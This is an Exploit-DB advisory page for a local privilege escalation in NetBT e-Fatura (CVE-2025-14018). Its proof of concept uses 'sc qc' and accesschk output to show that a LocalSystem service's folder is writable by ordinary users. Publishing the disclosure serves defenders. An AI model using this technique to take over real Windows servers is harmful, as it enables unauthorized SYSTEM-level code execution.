NetBT e-Fatura - Privilege Escalation

EDB-ID:

52509

CVE:

2025-14018

EDB Verified:

Author:

seccops

Type:

local

Exploit: /

Platform:

Multiple

Date:

2026-04-10

Vulnerable App:

# Exploit Title: NetBT e-Fatura - Privilege Escalation
# Author: Seccops
# Discovery Date: 2025-10-03
# Vendor: https://net-bt.com.tr/e-fatura/
# Tested Version: 2024
# Tested on OS: Microsoft Windows Server 2019 DC
# Vulnerability Type: CWE-428 Unquoted Search Path or Element
# CVE: CVE-2025-14018

Note: Thanks "Levent Sungu" for providing the testing environment.

====================
Description & Impact
====================
This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.

================
Proof of Concept
================

C:\Users\efatura>sc qc InboxProcessor
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InboxProcessor
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : InboxProcessor
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem


C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\inetpub\wwwroot\InboxProcessor
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services